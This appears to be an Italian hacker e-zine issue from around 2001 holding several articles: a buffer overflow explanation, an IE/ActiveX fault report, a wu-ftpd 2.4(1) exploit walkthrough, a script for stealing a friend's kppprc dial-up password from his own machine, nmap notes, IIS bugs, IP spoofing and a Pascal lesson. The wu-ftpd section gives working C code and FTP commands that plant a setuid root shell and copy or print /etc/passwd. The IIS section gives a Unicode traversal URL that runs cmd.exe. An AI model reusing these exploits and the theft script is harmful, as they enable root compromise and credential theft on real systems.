La cosa interessante è che è possibile sfruttare questo bug anche attraverso gli ActiveX
( veramente pericolosi,anche perchè le loro potenzialità sono sconosciute ai più ).
Allego una parte scritta in inglese,perchè mi sembra doveroso nei confronti di Shane che ha
sfruttato il bug tramite gli ActiveX,in caso di sviluppi mi aggiornerò al + presto.
I have managed to trigger the fault at various addresses.
In SHELL32.DLL v 4.72.3110.6
@7FCE2373
In MSIEFTP.DLL v 5.00.2014.209
@71211EE9
@71215C92
@712121D8
@71215BE6
This last address is interesting, it appears to be code
which is called when an invalid/not existing directory is
attempted to CWD to, at this address is the following code;
mov edx, [eax]
lea [ebp][0FFFFFA4C]
push edi
push ecx
push eax
call [edx + C] <-- possible call to code.
and eax seems to be loaded with a seemingly random value
when the fault occurs. If EAX is somehow controlled, or
happens to be our magic value, I assume running arbitary
code is quite possible, as the url is decoded and stored in
binary format in memory, although I am unsure as CS <> SS,
and I'm not sure exactly where in memory it is stored.
Shane
Come potete vedere le possibilità sono diverse e quel "running arbitrary code" è decisamente intrigante. ;)
/* Stack or Buffer Overflow */
Ho raggruppato questi due overflows perchè il concetto alla base degli exploit è simile x tutti e 2.
Questo bug riguarda i sistemi UNIX e similari e sfrutta la possibilità di alcuni programmi
eseguire del codice presente nello stack.Alcuni progs,infatti,hanno il bit SUID settato,
tipo "passwd",ovvero, per la durata del programma, chiunque lo usi ha la user ID del
proprietario.Ora, se il proprietario è il "root", capirete che l'utente può effettuare
liberamente qualsiasi operazione sui file.In teoria,però,se noi eseguiamo un programma
in modalità root,possiamo solo fare le operazioni permesse da quel programma...in teoria...
Immaginiamo invece di poter cambiare il codice eseguito in modalità superuser,x esempio
riuscendo a lanciare una shell,questa avrebbe un bel #.
Es:
#define dimensione 1024
void funzione (char *argomento)
{
char parametro[dimensione];
/* con questo facciamo una copia del rimo argomento */
strcpy(parametro,argomento);
/* qui invece operiamo sulla copia */
....
return;
}
main(int argc, char **argv)
{
/* e qui possiamo eseguire operazioni sul primo parametro */
funzione(argv[1]);
}
Questo programma, tramite la funzione "funzione", processa il primo argomento passato al
programma;l'array "parametro" è di dimensione =1024 byte.La stringa "argomento" viene
ricopiata sopra "parametro", senza però controllare la lunghezza.Quindi se "argomento"
fosse una stringa di lunghezza > 1024 byte, andremmo a sovrascrivere impropriamente delle
locazioni di memoria.Si sa,infatti, che le variabili locali di una funzione vengono allocate
sullo stack,subito dopo l'indirizzo di ritorno,ecco uno schema al riguardo:
indirizzi <- | variabili | indirizzo | argomenti passati | -> indirizzi
bassi | locali | di ritorno | alla funzione | alti
Ora, ecco lo stesso schema con la varabile locale array "parametro" di 1024 byte:
indirizzi <- | 1024 byte | indirizzo | argomenti passati | -> indirizzi
bassi | "parametro" | di ritorno | alla funzione | alti
Riguardando il primo listato,si vede che "funzione" ricopia la stringa "argomento" sopra
l'array "parametro".Facendo in modo che la stringa "argomento" sia più lunga di 1024 byte,
la stringa andrebbe a sovrascrivere il resto dello stack,indirizzo di ritorno x primo, poi
gli argomenti, via via verso gli indirizzi più alti.( ricordate,però,che non deve esserci
controllo dele lunghezze ).
Es:
prima dello strcpy() :
indirizzi <- | 1024 byte | indirizzo | argomenti passati | -> indirizzi
bassi | "parametro" | di ritorno | alla funzione | alti
dopo lo strcpy();
indirizzi<-| i primi 1024 | i byte | i byte dal 1028 | -> indirizzi
bassi | byte di | dal 1024 e 1027 | al 1199 (l'ultimo) | alti
| "argomento" | di "argomento" | di "argomento" |
| dal #0 a #1023 | che sovrascrivono| che sovrascrivono |
| | l'indirizzo di | il resto dello |
| | ritorno a 32 bit | stack |
All'uscita della funzione, il programma non tornerà nel main() subito dopo la chiamata, ma
salterà all'indirizzo puntato dai byte 1024-1025-1026-1027 di "argomento", che hanno sostituito
l'indirizzo di ritorno nello stack.In quei 4 byte noi potremmo mettere la porzione di codice che
vogliamo venga eseguita.Se,ad esempio, come argomento al programma passiamo una stringa che
contiene (in linguaggio macchina) del codice eseguibile nei byte 0-1023 e l'indirizzo di dove
questo codice si troverà in memoria nei byte 1024-1027, all'uscita della funzione il processore
andrà ad eseguire il nostro codice.
Se il nostro codice tramite una chiamata "execlp()" lancia una shell, questa shell avrà i diritti
"root",con la quale potrete dare sfogo alle vostre voglie represse :PP
L'unico problema è che dobbiamo sapere a quale indirizzo verrà messo il nostro argomento e,
naturalmente, usare programmi che non controllano la grandezza delle stringhe.
Naturalmente basterebbe al programmatore più attento settare la dimenisone del buffer con
"bufsize" oppure ricorrendo a stackguard,basato sul concetto che se il buffer overflow
sovrascriverà lo stack,dovrà x forza passare sopra una parte dello stack,chiamato [canary]
un semplice numero casuale settato all'avvio.Il numero,infatti, verrà salvato anche in una
posizione lontana dallo stack,quindi se il buffer passerà sopra il canary, il suo numero
sarà diverso dalla copia salvata in una porzione "sicura".Calcolate che le possibilità di
beccare il numero relativo al [canary] equivale a 2 alla 32esima,fate un po' voi... Qui
sotto metto lo schema dello stack,prima e dopo l'utilizzo di stackguard.
|local variables| |frame pointer| |instruction pointer|
|local variables| |canary| |frame pointer| |instruction pointer|
Avrete quindi notato che se avete la fortuna di trovare programmi che non utilizzano stackguard
o che non effettuano altri metodi di buffer overflow detection, l'utilizzo di questo exploit è
relativamente facile.
That's all folks!
Enjoy
{Cujo}
···················································································
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
_ __
_|_ _|_ __ __) (__| ___ \_' __ | __ o _|_
(__(__) (__(_ | |_, |__) (___ (O) | (__/_ / \ |__) |_, (__) | |_,
|
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: WU-FTP 2.4(1) EXPLOIT]
[Autore: Jrash]
[Consumo: merendine e panini al salame....]
[Musika askoltata: vari mp3 direttamente dal mio MPMan... uahhhh 180 karte!!!]
Holaga,premetto he questo articolo non lo ho scritto io, ma lo ho trovato
modificato, dato che lo trovavo interessante lo ho inserito nella rivista.Non conosco
l'autore ufficiale, se si facesse vivo mi farebbe un piacere!!!!! :)
Scrivo questo articolo non perche' io pensi che tutti voi non
conosciate il bug che c'e' nel wu-ftp 2.4(1), ma perche' mi sono rotto le
palle di sentir dire che e' un exploit che si puo' usare solo da locale...
BALLE!!!!!!!!! Se ci sono certe condizioni, il bug del wu-ftp 2.4(1) puo'
essere utilizzato anche per ottenere root da remoto!!!!!
Vediamo un po' come si fa:
Iniziamo con la versione "normale", cioe' quella che si trova da tutte le
parti, sul wu-ftp 2.4(1) bug.
Allora, come prima cosa, create un programmino che copi la shell nella
directory tmp (o dove vi pare) e che la renda eseguibile da chiunque, poi
compilatelo nel sistema che volete hackare.
Il programmino potrebbe essere questo:
shell.c
-----------tagliate qui------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main()
{
seteuid(0);
system("cp /bin/sh /tmp/.sh");
system("chmod 6777 /tmp/.sh");
system("chown root /tmp/.sh");
system("chmod 4755 /tmp/.sh");
system("chmod +s /tmp/.sh");
}
-----------tagliate qui------------
Quindi, collegatevi con ftp al vostro sito e loggatevi con il vostro user e
passwd...
220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)
ready.
Name (exploitablesys:root): goodaccount
331 Password required for goodaccount.
Password: (password)
230 User goodaccount logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
Quindi scrivete:
ftp> quote site exec bash -c id
Se vi risponde qualche cosa di questo tipo vuole dire che e' buggato:
200-bash -c id
200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
200 (end of 'bash -c id')
Se e' buggato non dovete fare altro che scrivere:
ftp> quote site exec bash -c /la/tua/home/dir/shell
200-bash -c /la/tua/home/dir/shell
200 (end of 'bash -c /la/tua/home/dir/shell')
ftp> quit
221 Goodbye.
Per avere nella dir tmp la shell di root.
OK, ricapitolando, questo bug e' "etichettato" come compromettente solo
per locale per 2 motivi:
1) Vi ci vuole un account per collegarvi ed eseguire la shell nella dir /tmp.
2) Dovete compilare il programmino sul sistema che volete hackare.
Ma a tutto questo si puo' ovviare :)
Innanzitutto, il sistema da attaccare deve concedere l'anonymous login per
l'ftp, cosi' potete loggarvici dentro e vedere se e' buggato.
Poi dovete vedere se il vostro bersaglio ha una dir scrivibile (in genere
/incoming)
Poi, dovete vedere in che dir del sistema remoto e' posto l'ftp
/home/ftp per Linux
/var/ftp oppure
/etc/ftp per gli altri
Quindi dovere modificare a seconda delle vostre esigenze il programmino
seguente, compilarlo e inviarlo nella directory scrivibile del vostro sistema
da attaccare:
-----------tagliate qui------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main()
{
seteuid(0);
system("cp /etc/passwd /home/ftp/incoming/h");
system("chmod 755 /home/ftp/incoming/h");
}
-----------tagliate qui------------
Poi con la maniera descritta sopra lo fate eseguire dal Wu-ftp, e vi ritrovate
con il file h che contiene le passwd del sistema.
N.B.: Ricordatevi di cambiare il percorso /etc/passwd con il percorso del
vostro file delle passwd ;)
Quindi non avete altro da fare che scaricarlo e crackare qualche account per
poi collegarvi al sistema e sfruttare nuovamente il bug di wu-ftp (questa
volta nella maniera classica ;) per diventare root.
Naturalmente ci puo' essere qualche problema utilizzando questo metodo perche'
il programma gia' compilato da voi e uploadato sul sistema bersaglio puo'
non funzionare, inutile dire che per cercare di ovviare a questo inconveniente
dovete cercare di compilare il suddetto programmino su un sistema che e' il
piu' possibile simile a quello che provate ad hackare.
Un altro problemino e' che nella dir /incoming ci rimane il file h, che
contiene il file delle passwd del sistema, e quindi se il sysadm lo vede puo'
cominciare a sospettare qualche cosa.....
Pero', se crackate subito qualche account e poi diventate root non ci sono
problemi, lo togliete subito. Se pero' le passwd sono difficili da crackare
e vedete che per trovare un account vi ci vuole piu' del previsto (cosa
parecchio, ma parecchio rara perche' se un sito ha il bug del wu-ftp vuol dire
che il livello di sicurezza non e' molto alto) basta che vi compiliate un altro
programmino che toglie h e tutti i prog che avete inviato dalla dir /incoming
e lo facciate eseguire sempre con il wu-ftp.
Non sto a mettere un esempio del programmino perche' non ho voglia e perche'
penso che se non siete capaci di farlo da soli e' meglio che non diveniate
root su qualche sistema :)
Cmq, se proprio ci tenete a non lasciare momentaneamente file compromettenti
nella dir /incoming del sito che attaccate, spediteci questo programmino al
posto di quello precedente (compilato naturalmente ;) che, invece di copiare
tutto il contenuto del file delle passwd, lo mostra.
-----------tagliate qui-----------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main()
{
seteuid(0);
system("cat /etc/passwd");
}
-----------tagliate qui-----------
Pero' il problema principale del metodo descritto qui sopra e' un altro ....
Per capirlo bene e' necessario spiegare un po' meglio come funge l'exploit
descritto sopra. Innanzitutto il bug sta nel fatto che il site exec ha
(di default) come PATH di esecuzione /bin per gli utenti registrati, (quindi
consente di fare praticamente tutto) e non controlla il reale uid e gid di chi
esegue il comando prima di farlo, quindi praticamente e' come se passaste i
comandi come root.
Il fatto pero' e' che quando vi collegate come anonymous vi prende come PATH
di esecuzione non /bin ma /home/ftp/bin (nel caso di linux), che in genere
e' una dir non scrivibile e che non contiene programmi che possono servire come
ad esempio la bash.
Quindi a meno di settaggi clamorosi della dir /home/ftp/bin/ come ad esempio
la capacita' di poterci uploadare roba, oppure di contenere la shell, se fate
il SITE EXEC bash -c id non otterrete nulla.
Comunque, si puo' sempre ovviare a questo e sfondare da remoto, se ci sono
certe condizioni:
1) la dir /home/ftp/bin contiene il comando tar
2) ho una dir scrivibile dove mettere file
3) posso fare un site chmod
Funziona cosi': Mi faccio un programmino che fa un seteuid(0), chiama
chmod(0755, "/home/ftp/bin") e copia lo std input nello std output.
Poi lo inviate nella dir scrivibile insieme a dei file compressi con il tar che
contengono una shell linkata staticamente (se no quando la eseguite con il site
exec non va perche' cerca i vari file /lib/lib.so etc etc) e i programmi di cui
avete bisogno.
Poi scrivete:
site exec tar --use-compress-program /incoming/hack -xf /incoming/programmi_miei.tar
Questo dovrebbe estrarre i vostri file nella directory /home/ftp/bin
consentendovi cosi' dopo di chiamare la shell che avete messo in
programmi_miei.tar e di utilizzare il site exec con quella shell per lanciare i
vari programmini presentati sopra per prendervi il file delle passwd.
Vorrei salutare tutti quelli che mi conoscono, soprattuto i miei amici di crew
A[v]a[t]A[r] e syn.....byezzz....... _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- w w w . u m c r e w . t s x . o r g _-_-_-_-_-_-_-_-_-_-[Jrash]°
···············································································
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
_
_|_ __ _|_ _|_ ___ __ ___ | ___ __ __ __ __
| (__) |_, |_, (__/_ | ' (__/_ |_, (__/_ |__) (__( __) __)
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: fottere le password in Linux]
[Autore: FeltonSpray]
Disclaimer
Credo che su questo articolo non ci sia bisogno di un disclaimer beh sicuramente
non è una bella azione rubare le pass del tuo amiko o del tuo migliore amico
ma a noi non c'e ne frega un CAZZO! Se volete fare i bastardi fatelo senno mi
sa che è inutile che leggete sto TXT Cmq io ve lo spiego lo stesso fate come volete!
Ciao ragazzi e benvenuti nel mio nuovo articolo!! =)
Quindi dato che io non sono un maestro di linux mi sono messo un pò a cercare
tutti i suoi file qundo ho notato uno in cui si trova su una cosa carina eheh
/home_utente/.kde/share/config/kppprc voi direte: A me cazzo frega???
Hehehe beh qui si trovano tutti i dati contenuti nel kppp quindi tutti i dati
di connessione e la passwd è scritta in chiaro!!! Hehhe andiamo con ordine:
Kppp in linux gestisce la connessione remota semplificando tutta la procedura
testuale con una grafica di facile intuizione ma naturalmente per ricordarsi
i dati li deve pure registrare da qualche parte.... beh cercando ho trovato il
file sopra riportato che contiene tutto il settagio =). Beh ma per fare questo
dovete lavorare da locale quindi... andate da qualche vostro amiko che uso linux
possibilmente non da molto =) e data la vostra esperienza (hhihi) lo volete aiutare
quindi noi ci creiamo un semplice script che poi ci aiuterà in seguito, facciamo
tutto con ordine, vi spiego tutti i passagi eheheh:
1) Uscite di casa vostra ed andate a casa sua =) (heeh vi devo spiegare anche questo???)
2) Suonate il suo citofono e possibilmente evitate di dire c'è GIGI?? hihih
3) Salite a casa sua e cominciate a fare gli espertoni di linux
4) Chiedete un bicchiere d'acqua (mò vi spiego hihihi)
5) Mentre lui va di là a prendere sto bicchiere d'acqua uscite il vostro bel dischetto e inseritelo
***Pensioro di FeLtOnSpRaY... "L'amiko è rimasto fottuto per il bicchier d'acqua UAHAHAHA" Fine Pensiero***
6) Heheh secondo voi che dovete fare??? eheheheh
7) Non c'è nessun punto 7 =)
Beh ma voi dite: Che cazzo ci dovevo mettere nel disketto?? E presto detto...
Dovete creare uno script di 3 righe che vi semplifica la vita con questo codice:
#!/bin/bash
echo Mò gli fotto le pass... hehehe =) !!!
cp /root/.kde/share/config/kppprc /mnt/floppy/passFottute.txt
Tutto quì beh se il vostro amiko e mezzo furbo da non entrare come root createvene tanti
a casa di sti script con varie diciture tipo se si chiama asdrubale mettete.....
/asdrubale/.kde/share/config/kppprc /mnt/floppy/passFottute.txt eheheh tutto qui.
Ascoltate sò che non ve ne fate un cazzo di un login per un provider visto che si possono
registrare gratis ma provate a far camminare il cervello due secondi.... gli utenti medio
stupidi non si mettono a ricordarsi 30.000 pass quindi quella potrebbe coincidere con molte
cose tipo la pass del suo sito, oppure la pass della sua e-mail oppure la pass della sua
cassaforte =) hehe. Beh adesso credo propio che ho finito quindi chiudo e vi raccomando
di volermi bene =) e di scrivermi qualsiasi sia il problema (civile, penale, consigli sul sesso,)
heeheh beh apparte gli scherzi per info, approfondimenti, consigli, errori, o altro...
feltonspray@katamail.com
http://spazioweb.inwind.it/feltonspray/
oppure mi cercate su C6 con il nick feltonspray
oppure su irc.azzurra.it #ahccc #h4ck-italia #hackersonline
Ciauz a presto by
FeLtOnSpRaY
···············································································
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
_|_ _|_ _|_ __ __ __ __ __ __ __
|_, (__(_ |_, |_, (__) __) (__(_ | ) | ) ) (__( |__)
|
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: TUTTO SU "NMAP"]
[Autore: Jrash^^] [Crew : UMc's member] [E-mail: jrash@hackersat.com]
Nome
nmap - Strumento di esplorazione della rete e scanner della sicurezza
Sintassi
nmap [Tipo(i) di scan] [Opzioni] <host o rete #1 ... [#N]>
Descrizione
Nmap è disegnato per permettere ai sysadmin ed a individui curiosi di scannerizzare grosse reti
per determinare quali host sono attivi e quali servizi offrono. Nmap supporta un gran numero di
tecniche di scan come per esempio: UDP, TCP connect(), TCP SYN (half open), ftp proxy (bounce
attack), Reverse-ident, ICMP (ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep, e Null scan.
Leggete la sezione tipi di scan per maggiori dettagli.
Nmap offre anche molte funzioni avanzate come il detect del sistema operativo da remoto via
TCP/IP fingerprinting, stealth scanning, dynamic delay e retrasmission calculations, parallel
scanning, detect degli host 'down' con il parallel ping, decoy scanning, detect di port
filtering, RPC scanning diretto (non-portmapper), fragmentation scanning e specificazione
flessibile di target e host.
Uno sforzo significativo è stato messo per ottenere una performance decente di nmap per gli
users non-root. Sfortunatamente molte interfacce critiche del kernel (come i raw sockets)
richiedono i privilegi di root. Nmap deve essere usato da root, quando possibile.
Il risultato di eseguire nmap è di solito una lista di porte interessanti della macchina (o
delle macchine) scannerizzate. Nmap dà sempre il nome del servizio 'well known' (entro le prime
1024 porte?), numero, stato e protocollo. Lo stato è sia 'open' (aperto)
che 'filtered'
(filtrato) che 'unfiltered' (non filtrato). 'Open' significa che la macchina scannata accetterà
connessioni su quella porta. 'Filtered' significa che un firewall, un filtro o un altro ostacolo
di rete copre la porta e previene nmap dal determinare se la porta è aperta. 'Unfiltered'
significa che la porta è conoscita da nmap come chiusa e nessun firewall o filtro sembra
interferire con i tentativi di nmap di stabilirlo. Le porte 'unfiltered' sono casi comuni e
vengono mostrate solo se la maggior parte delle porte scannate sono in stato di filtering.
Dipendentemente dalle opzioni usate, nmap può inoltre riportare le seguenti caratteristiche
dell'host remoto: Sistema Operativo (OS) in uso, capacità di azzeccare la sequenza TCP, username
di quelli che eseguono i programmi che hanno il bound su ogni porta, il nome DNS, se l'host e'
uno smurf address, e alcune altre.
Grazie per l'attenzione!
Vorrei fare un saluto ai miei cari amici di IRC dado ed angelocattivo;
inoltre saluto tutti i membri dell H@team e la mia adorata Giada.......BiEzZ.....lol
18/03/2001 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>jrash@hackersat.com<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<[Jrash]°
···············································································
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
o __ __ |__ __ __
| __) __) |__) (__(_ (__| __)
__/
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: ISS Bugs]
[Autore: Ulisses1]
Beh... allora.. vediamo un po' i bugs che ricordo nel server iis...
Bug1) Ida.ida
Diciamo di voler testare l'esistenza della cartella /ciao/ nel server
www.atlantide.it come facciamo?
http://www.atlantide.it/ciao/ida.ida
la risposta sarà: File ida.ida. The system cannot find the path specified.
ciò vuol dire che non è stata trovata tale cartella. Proviamo ora invece a cerkare
la cartella /libro/
http://www.atlantide.it/libro/ida.ida
La risposta sarà: The IDQ file ida.ida could not be found.
Evviva la cartella esiste!!
Questo bug può essere applicato per trovare cartelle abbastanza importanti, like:
/admin/, /IISADMIN/, ecc..
Bug2) RDS bug, come funziona?
http://www.esempio.it/msadc/msadcs.dll
Content-Type: application/x-varg Content-Length: 6 W
Se otteniamo questa risposta è presente il bug rds, per cui con particolari toolz
per linux, reperibili su http://packetstorm.securify.com , possiamo agire
liberamente sul server.
Bug3) Estensioni FrontPage non passwordate
Bene... questo è un vekkissimo bug, ormai sono pokissimi i server i cui è ancora
presente, ma non è impossibile trovarne.
prendiamo il solito esempio www.esempio.it e apriamo front-page, è presente
nella barra degli strumenti, modifichiamo la pagina e poi salviamola con nome.
ad esempio se l'index del sito è www.esempio.it/index.html sarà questo il nome
che le daremo. Andando su www.esempio.it troveremo la pagina da noi inserita e
non l'originale.
Bug4) Unicode
http://www.esempio.it/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
Tramite questa stringa è possibile eseguire comandi arbitrari sul server vittima
Sembra funzionare perfettamente su sistemi iis4/5
Beh.. questi sono i bugs principali e più conosciuti, ne sono stati scoperti altri
che riporterò più in la... per ora auguro buona fortuna a tutti..
Ulisses1
···············································································
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
_
o __ __ __ __ __ _|_ o __ __
| |__) __) |__) (__) (__) | | | ) (__|
| | __/
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: IP Spoofing]
[Autore: Cujo]
Eccomi qui a esporre un argomento di cui avrete sentito parlare molto e ,
probabilmente,avrete letto altrettanto.Questo articolo,però,cerca di
entrare un po' più nello specifico,integrando il concetto di ip spoofing
con quello di tcp hijacking che sfrutta,appunto, i bugs del protocollo
tcp e del 3 Way handshaking.
/*
Ip Spoofing
In uno scambio di dati attraverso tcp/ip, l'identificazione delle
parti interessate alla comunicazione avviene attraverso i 4 byte che
costituiscono l'indirizzo ip di ciascuna di esse. In mancanza di
sistemi di autenticazione più sofisticati (come Kerberos, sviluppato
al MIT), l'indirizzo ip costituisce l'unica garanzia che la macchina
con cui parliamo sia veramente chi dice di essere. Ora, forgiare
datagrammi con un indirizzo ip falso non è difficile (bastano i
diritti di root e poche linee di codice C) e utilizzando come mattone
questa tecnica, nota come ip spoofing, è possibile congegnare
attacchi molto potenti che sfruttano proprio la mancanza di algoritmi
di autenticazione sicuri. L'utilizzo dello spoofing è
sufficientemente semplice con protocolli sessionless, quali udp e
icmp ma, con un po' di lavoro in più, è possibile andare all'assalto
anche di un protocollo session-oriented come tcp. Un esempio è il tcp
spoofing,che necessita della presenza di una relazione di trust, in
cui un certo host accetta comandi (con rsh) e login remote (con
rlogin) da un altro computer senza richiedere password, facendo
affidamento solo sull'indirizzo ip riportato nei pacchetti
ricevuti.Ad esempio: l'host A accetta comandi da B senza richiedere
password e X sfrutterà proprio questa relazione di trust impersonando
B nell'instaurare una connessione con A e inviando un comando del
tipo: echo "+ +" > ?/.rhosts Questo comando estenderà tale relazione di
trust a qualsiasi host in rete, ponendo A sotto il completo controllo
di X (il file .rhosts indica chi non deve fornire password per
effettuare il login e grazie all'istruzione"+ +" noi indichiamo
"tutti".) Quello che rende le cose un po'' complicate sono i
sequence number: tutti i segmenti tcp sono numerati (in realtà sono i
byte del payload ad essere numerati,in modo che chi li riceve possa
verificare che tutti i dati inviati siano giunti a destinazione e, in
caso ciò non sia avvenuto, si possa chiedere una nuova trasmissione
dei pacchetti mancanti. Più precisamente, ogni pacchetto p ha i
seguenti due campi di 32 bit : SEQN (sequence number): numero del
pacchetto p ACKN (acknowledgement number): numero dell'ultimo
pacchetto ricevuto dal mittente di p, aumentato di un'unità Ogni host
X tiene traccia di questi numeri allocando due contatori SEQN(X) e
ACKN(X) per ogni connessione e incrementandoli man mano che i
pacchetti partono e arrivano. Il primo riporta il numero del prossimo
pacchetto da spedire mentre il secondo si riferisce al prossimo da
ricevere .
3 Way Handshaking
Il 3-Way handshaking serve proprio a sincronizzare questi
contatori tra i due host che partecipano alla stessa connessione: i
segmenti con il tag SYN attivato hanno infatti lo scopo di comunicare
all'interlocutore il valore iniziale del sequence number per quella
connessione, mentre gli ACK di ritorno permettono di verificare che i
pacchetti spediti siano stati ricevuti con successo. Il difficile sta
nel fatto che quando X comincia il collegamento mandando ad A un SYN
che afferma di provenire da B, il SYN/ACK in risposta sarà ovviamente
diretto a B. X, a meno di poter sniffare la comunicazione tra A e B,
non potrà vedere il sequence number iniziale di A e instaurare la
connessione, visto che se l'ACKN del terzo pacchetto dell'handshaking
non corrisponde a quello atteso (e cioè al SEQN del secondo aumentato
di uno), verrà scartato. La soluzione sta nell'indovinare il sequence
number iniziale di A. Ora,le implementazioni dello stack tcp/ip fanno
sì che i sequence number siano abbastanza prevedibili. Nella maggior
parte dei casi il sequence number iniziale viene preso da un contatore
incrementato periodicamente (di solito 128.000/sec) e, ulteriormente,
ad ogni nuova connessione (di solito di 64.000). L'attaccante, quindi,
deve solo mandare un certo numero di ping ad A per misurare il tempo
medio di round-trip r dei pacchetti, cominciare un handshaking (non
spoofed) per leggere il valore attuale del contatore e, subito dopo,
può iniziare l'attacco vero e proprio ), utilizzando come ACKN verso A
(pacchetto n.3) il sequence number ricevuto dalla connessione
precedentemente iniziata, aumentandolo nel nostro esempio di
64.000+128.000*r+1. Se la stima è precisa, con un numero non troppo
elevato di tentativi sarà possibile indovinare il numero giusto,
completare la connessione e poi inviare il comando desiderato, sicuri
del fatto che A sarà felicemente convinto che tale istruzione provenga
dal server B. Se le cose sembrano già abbastanza complicate, va
aggiunto che non bisogna dimenticarsi del SYN/ACK che A manderà a
B. Se tale pacchetto giunge a destinazione, B risponderà con un RST
che chiuderà la connessione. Per evitare che ciò accada è sufficiente
un SYN flooding contro B, in modo da riempire la sua backlog e far sì che il
SYN/ACK di A vada perso.
*/
Presumo che abbiate le idee un pochino confuse,comunque basta rileggersi
un paio di volte l'articolo x capire meglio,oppure leggersi un bel rtf sul
protocollo tcp/ip.Nel prossimo numero completerò l'articolo aggiungendo il
tcp hijacking,dato che fino a qua ho parlato di "blind spoofing",xchè l'host
X (noi) non può sniffare il traffico passante tra A e B.Logicamente
se noi siamo sullo stesso segmento di rete dei due hosts,magari una rete
ethernet,possiamo fregarcene di provare a indovinare i sequence numbers,e
prendere il controllo della connessione tra A e B,utilizzando il tcp
hijacking.Tutto questo,però,nel prox numero,dato che bisogna introdurre
concetti nuovi,e l'articolo appena letto è già abbastanza pesantuccio ;)
{Cujo}
___________________________________________________________ ____________________________________________
| _____ _____ _____ _____ _____ ___ ___ ___ ___ ___ _ __ _ _____ |
| | _ \ | _ \ / _ \ / ___| | _ \ / | / |/ | / |/ | | | | \ | | / ___| |
| | |_| | | |_| | | | | | | | | |_| | / /| | / /| /| | / /| /| | | | | \| | | | |
| | ___/ | _ / | | | | | | _ | _ / / / | | / / |__/ | | / / |__/ | | | | | |\ | | | _ |
| | | | | \ \ | |_| | | |_| | | | \ \ / / | | / / | | / / | | | | | | \ | | |_| | |
| |_| |_| \_\ \_____/ \_____/ |_| \_\ /_/ |_| /_/ |_| /_/ |_| |_| |_| \_| \_____/ |
--------------------------------------------------------------------------------------------------------
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
__
__ __ __ __ __ | __ __ __ _|_ ___ __)
|__) (__( __) (___ (__( |_, |__) (__( | ' |_, (__/_ (___
| |
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: Pascal (Parte 2)]
Autore: _______________________________________ EvilAngel
Tempo di scrittura: ___________________________ 10 minuti(1^ parte)
20 minuti(2^ parte)
Consumo: ______________________________________ 3 caramelle al caffè
1 bottiglia di coca riempita d'acqua
Saluti: _______________________________________ stanno alla fine
Ok, dopo aver spiegato le basi, passiamo alla TEORIA.
Tutto ciò che dirò in questa lezione, è puramente per creare delle basi per la logica della programmazione. (Ehy, non è un disclaimer, è solo una descrizione!).
Allora, possiamo dire che, per realizzare un programma in TP, usiamo l'ALGORITMO TOP-DOWN.
Azzo è?
Un algoritmo è un tipo di programmazione, in particolare, il top-down consiste nello scomporre il progetto iniziale in tanti sottoblocchi (nel nostro caso le procedure), facilitando il lavoro.
Ad esempio, per fare un programma che calcola la somma di due numeri, possiamo cominciare a fare un programma principale (o MAIN PROGRAM) in questo modo:
Program somma;
Uses crt;
var .......
begin
Inserisci_numeri;
Somma_numeri;
Visualizza_risultato;
repeat until keypressed;
end.
Sicuramente vi chiederete come fa il programma a interpretare comandi tipo Inserisci_numeri o simili. Non sono comandi, sono procedure che realizzeremo prima del main program.
Ad esempio, un ipotetica procedura Inserisci_numeri potrebbe essere:
Procedure Inserisci_numeri;
var .......
begin
clrscr;
writeln('Inserisci il primo valore');
readln(a)
writeln('Inserisci il secondo');
readln(b);
end;
Tutto qui?
Perchè non li sommiamo pure, e facciamo tutto insieme?
Fin quando il programma è piccolo, le procedure sono utili relativamente, ma quando il programma si fa pesante, è bene usare procedure per ottimizzarne la scrittura.
Un'altra cosa a proposito delle variabili e delle procedure:
Ci sono due tipi di variabili.
Possiamo, infatti, usare una variabile in una sola procedura, per cui, per limitare lo spazio di memoria occupata, la definiamo nella procedura stessa. Però, se volessimo richiamare una variabile presente in un altra procedura non inizializzata nel main program o nella procedura dove stiamo lavorando, non potremo farlo.
E ora passiamo alle procedure.
Le procedure possono assumere dei PARAMETRI.
I parametri sono delle variabili che immettiamo nel main program dopo aver richiamato la procedura, tra parentesi tonde.
Ad esempio:
Inserisci_numeri(a,b);
Che succede?
In questo modo, a e b sono diventate PARAMETRI della procedura.
Se, infatti, facessimo una procedura:
Procedure Somma_numeri(var a,b:integer);
var .....
begin
c:=a+b;
end;
...avremmo un tipico esempio di procedura con parametri. In questo caso, se scrivessimo:
Somma_numeri(1,5);
faremmo in modo che C abbia il valore di 6.
Se nel corso della procedura facciamo variare il valore dei parametri, dobbiamo scrivere VAR nelle parentesi, altrimenti basta scriverne il nome e il tipo.
NOTA: i parametri devono essere dichiarati nel main program come variabili effettive.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
STRUTTURE
Arieccome. Ora sono pronto ad affrontare un altro argomento, le strutture di un programma.
